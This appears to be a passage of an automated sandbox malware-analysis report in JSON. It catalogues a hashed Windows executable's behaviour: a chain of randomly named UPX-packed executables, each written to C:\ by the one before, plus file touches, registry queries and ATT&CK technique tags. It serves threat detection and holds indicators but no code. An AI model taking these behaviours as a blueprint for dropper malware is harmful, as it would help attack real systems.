\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"c:\\24680.exe\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"24680.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"2428202.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"00062.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"njhfl.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"66840.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"60064.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"2288488.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"48866.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xbxthhr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"fhhxhtt.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"648042.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"80004.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" writes file \"c:\\24680.exe\"\n \"24680.exe\" writes file \"c:\\2428202.exe\"\n \"2428202.exe\" writes file \"c:\\00062.exe\"\n \"00062.exe\" writes file \"c:\\njhfl.exe\"\n \"njhfl.exe\" writes file \"c:\\66840.exe\"\n \"66840.exe\" writes file \"c:\\60064.exe\"\n \"60064.exe\" writes file \"c:\\2288488.exe\"\n \"2288488.exe\" writes file \"c:\\48866.exe\"\n \"48866.exe\" writes file \"c:\\xbxthhr.exe\"\n \"xbxthhr.exe\" writes file \"c:\\fhhxhtt.exe\"\n \"fhhxhtt.exe\" writes file \"c:\\648042.exe\"\n \"648042.exe\" writes file \"c:\\80004.exe\"\n \"80004.exe\" writes file \"c:\\08446.exe\"\n \"08446.exe\" writes file \"c:\\28848.exe\"\n \"28848.exe\" writes file \"c:\\8240402.exe\"\n \"8240402.exe\" writes file \"c:\\802848.exe\"\n \"802848.exe\" writes file \"c:\\4404864.exe\"\n \"4404864.exe\" writes file \"c:\\dbhbvhd.exe\"\n \"dbhbvhd.exe\" writes file \"c:\\xfllptv.exe\"\n \"xfllptv.exe\" writes file \"c:\\pppjrfj.exe\"\n \"pppjrfj.exe\" writes file \"c:\\tjtvdt.exe\"\n \"tjtvdt.exe\" writes file \"c:\\428848.exe\"\n \"428848.exe\" writes file \"c:\\dtdld.exe\"\n \"dtdld.exe\" writes file \"c:\\bpxbh.exe\"\n \"bpxbh.exe\" writes file \"c:\\tjjhnh.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"24680.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2428202.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"00062.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"njhfl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"66840.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"60064.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"2288488.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"48866.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xbxthhr.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"fhhxhtt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"648042.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"80004.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"08446.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"28848.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8240402.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"802848.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4404864.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dbhbvhd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xfllptv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pppjrfj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"tjtvdt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"428848.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dtdld.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bpxbh.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"C30E0DACC492713127AD13CD8F7814AEA6E97EA4FBE3698944712B3DCCED7AFA\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"c30e0dacc492713127ad13cd8f7814aea6e97ea4fbe3698944712b3dcced7afa.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"pltvbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"npdthpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dhtjtp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfrbnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"00068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"840262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4880662.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"28028.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"040202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rtbxtx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0228228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"080844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"046220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4042804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4042804.exe]- [targetUID: 00000000-00002840]\n \"048424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\048424.exe]- [targetUID: 00000000-00001604]\n \"802262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\802262.exe]- [targetUID: 00000000-00000784]\n \"848084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848084.exe]- [targetUID: 00000000-00000784]\n \"0406488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0406488.exe]- [targetUID: 00000000-00002312]\n \"vlhdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vlhdl.exe]- [targetUID: 00000000-00003304]\n \"rpnxll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpnxll.exe]- [targetUID: 00000000-00001116]\n \"rrhrlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rrhrlx.exe]- [targetUID: 00000000-00001116]\n \"dpdrtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpdrtr.exe]- [targetUID: 00000000-00001512]\n \"224404.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\224404.exe]- [targetUID: 00000000-00001512]\n \"068668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\068668.exe]- [targetUID: 00000000-00000416]\n \"82086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\82086.exe]- [targetUID: 00000000-00003220]\n \"0002860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0002860.exe]- [targetUID: 00000000-00001468]\n \"2404242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2404242.exe]- [targetUID: 00000000-00001468]\n \"426882.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\426882.exe]- [targetUID: 00000000-00001472]\n \"26684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26684.exe]- [targetUID: 00000000-00001472]\n \"662068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\662068.exe]- [targetUID: 00000000-00001292]\n \"262684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\262684.exe]- [targetUID: 00000000-00004020]\n \"rhxdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhxdb.exe]- [targetUID: 00000000-00003700]\n \"4202648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4202648.exe]- [targetUID: 00000000-00003844]\n \"pnxhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pnxhn.exe]- [targetUID: 00000000-00003844]\n \"vxjvbn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vxjvbn.exe]- [targetUID: 00000000-00001228]\n \"tbxtf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbxtf.exe]- [targetUID: 00000000-00001228]\n \"djhpdbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djhpdbh.exe]- [targetUID: 00000000-00001208]\n \"dvftv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvftv.exe]- [targetUID: 00000000-00001208]\n \"bdxfltt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdxfltt.exe]- [targetUID: 00000000-00003264]\n \"ntxjntx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntxjntx.exe]- [targetUID: 00000000-00004544]\n \"rdjtrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdjtrt.exe]- [targetUID: 00000000-00004224]\n \"dtndd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtndd.exe]- [targetUID: 00000000-00001796]\n \"lxxvtvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxxvtvn.exe]- [targetUID: 00000000-00001796]\n \"rdrhhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdrhhx.exe]- [targetUID: 00000000-00004364]\n \"nbvdjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nbvdjp.exe]- [targetUID: 00000000-00001844]\n \"jfnlx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jfnlx.exe]- [targetUID: 00000000-00001844]\n \"jjjhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjjhv.exe]- [targetUID: 00000000-00004048]\n \"xldxxbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xldxxbf.exe]- [targetUID: 00000000-00002776]\n \"206828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\206828.exe]- [targetUID: 00000000-00003656]\n \"20468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20468.exe]- [targetUID: 00000000-00003656]\n \"240248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240248.exe]- [targetUID: 00000000-00003864]\n \"brpvfll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brpvfll.exe]- [targetUID: 00000000-00004492]\n \"tjjhnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjjhnh.exe]- [targetUID: 00000000-00004492]\n \"bpxbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bpxbh.exe]- [targetUID: 00000000-00004568]\n \"dtdld.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtdld.exe]- [targetUID: 00000000-00004568]\n \"428848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\428848.exe]- [targetUID: 00000000-00002700]\n \"tjtvdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjtvdt.exe]- [targetUID: 00000000-00002700]\n \"pppjrfj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pppjrfj.exe]- [targetUID: 00000000-00003276]\n \"xfllptv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xfllptv.exe]- [targetUID: 00000000-00004092]\n \"dbhbvhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dbhbvhd.exe]- [targetUID: 00000000-00003628]\n \"4404864.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4404864.exe]- [targetUID: 00000000-00003628]\n \"802848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\802848.exe]- [targetUID: 00000000-00003564]\n \"8240402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8240402.exe]- [targetUID: 00000000-00000692]\n \"28848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28848.exe]- [targetUID: 00000000-00004488]\n \"08446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08446.exe]- [targetUID: 00000000-00004168]\n \"80004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\80004.exe]- [targetUID: 00000000-00003968]\n \"648042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\648042.exe]- [targetUID: 00000000-00003968]\n \"fhhxhtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhhxhtt.exe]- [targetUID: 00000000-00004460]\n \"xbxthhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbxthhr.exe]- [targetUID: 00000000-00004236]\n \"48866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48866.exe]- [targetUID: 00000000-00006120]\n \"2288488.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2288488.exe]- [targetUID: 00000000-00006120]\n \"60064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60064.exe]- [targetUID: 00000000-00004340]\n \"66840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66840.exe]- [targetUID: 00000000-00004296]\n \"njhfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\njhfl.exe]- [targetUID: 00000000-00005896]\n \"00062.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00062.exe]- [targetUID: 00000000-00005896]\n \"2428202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2428202.exe]- [targetUID: 00000000-00003744]\n \"24680.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24680.exe]- [targetUID: 00000000-00003744]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used 